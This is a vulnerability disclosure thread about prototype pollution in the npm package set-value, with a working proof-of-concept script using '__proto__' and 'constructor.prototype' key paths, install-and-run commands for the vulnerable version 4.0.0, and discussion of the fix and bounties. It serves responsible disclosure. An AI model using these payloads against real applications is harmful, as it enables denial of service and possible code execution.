Prototype Pollution in jonschlinkert/set-value

Valid

Reported on

Aug 30th 2021


✍️ Description

set-value package is vulnerable to Prototype Pollution. The set function fails to validate which Object properties it updates. This allows attackers to modify the prototype of Object, causing the addition or modification of an existing property on all objects.

🕵️‍♂️ Proof of Concept

Create the following PoC file:

// poc.js
var setValue = require("set-value")
let obj = {}
console.log("Before: " + {}.polluted)
setValue(obj, [['__proto__'], 'polluted'], 'Yes! Its Polluted')
console.log("After: " + {}.polluted)

Execute the following commands in the terminal:

npm i set-value # Install affected module
node poc.js #  Run the PoC

Check the Output:

Before : undefined
After : Yes! Its Polluted

💥 Impact

It may lead to Information Disclosure/DoS/RCE.

ready-research submitted a
2 months ago
ready-research
2 months ago

Researcher


var setValue = require("set-value") let obj = {} console.log("Before: " + {}.polluted) setValue(obj, [['constructor'],['prototype'], 'polluted'], 'Yes! Its Polluted') console.log("After: " + {}.polluted)

Jon Schlinkert validated this vulnerability a month ago
ready-research has been awarded the disclosure bounty
The fix bounty is now up for grabs
ready-research
a month ago

Researcher


@admin @adam please read the comments in https://github.com/jonschlinkert/set-value/pull/33

Jamie Slome
a month ago

Admin


@ready-research - I have commented on the GitHub pull request.

Chad Whitacre
a month ago

Based on the PR in set-value it seems that @ready-research should be awarded the fix bounty. Is there no way to do that without the repo maintainer's cooperation? Clearly you can't force the repo maintainer to cooperate, and it seems unfair to @ready-research not to override somehow here.

Jamie Slome
a month ago

Admin


@chad - we are improving our automation in this - generally our system would have picked it up if the permalink reference in the report had matched that of the fix.

But seeing as @ready-research's fix was used - we will definitely look to reward the bounty here.

Thanks for your feedback! 🎉

Jamie Slome confirmed that a fix has been merged on b057b1 a month ago
ready-research has been awarded the fix bounty
Jamie Slome
a month ago

Admin


@ready-research - just a heads up that in the future, avoid opening the PR in public, as it can break the responsible disclosure.

Great work all!

ready-research
a month ago

Researcher


@chad Thank you.

@jamie Yeah, sure. Thanks.

webbusiness2019
9 days ago

where to create poc.js? its throws an error: TypeError: Object keys must be strings or symbols at validateKey (E:\WebBusiness\App\MyBusinessCard\node_modules\set-value\index.js:24:11) at setValue (E:\WebBusiness\App\MyBusinessCard\node_modules\set-value\index.js:141:5) at Object.<anonymous> (E:\WebBusiness\App\MyBusinessCard\poc.js:5:1)

ready-research
9 days ago

Researcher


@webbusiness2019 This issue got fixed in the latest version. Please try this in vulnerable version.

webbusiness2019
9 days ago

this error is totally new for me, so I can not get your point and when I am a new in react-native so don't know where to find vulnerable version... can you please explain in detail

ready-research
9 days ago

Researcher


@webbusiness2019 set-value 4.0.0 is vulnerable. Fixed in 4.0.1. Use the below commands to install the vulnerable version and run the code.

npm i set-value@4.0.0
node poc.js
Jacob Wejendorp
5 days ago

According to my testing, v2.0.1 is another safe release. If you we can confirm this, can you help get the CVE/CPE corrected to show < 2.0.1, >= 3.0.0 < 4.0.1.

Jamie Slome
5 days ago

Admin


@jacob - Snyk published this CVE, so your best bet is to get in touch with their security researcher team ❤️

Jacob Wejendorp
5 days ago

Thanks Jamie, will do.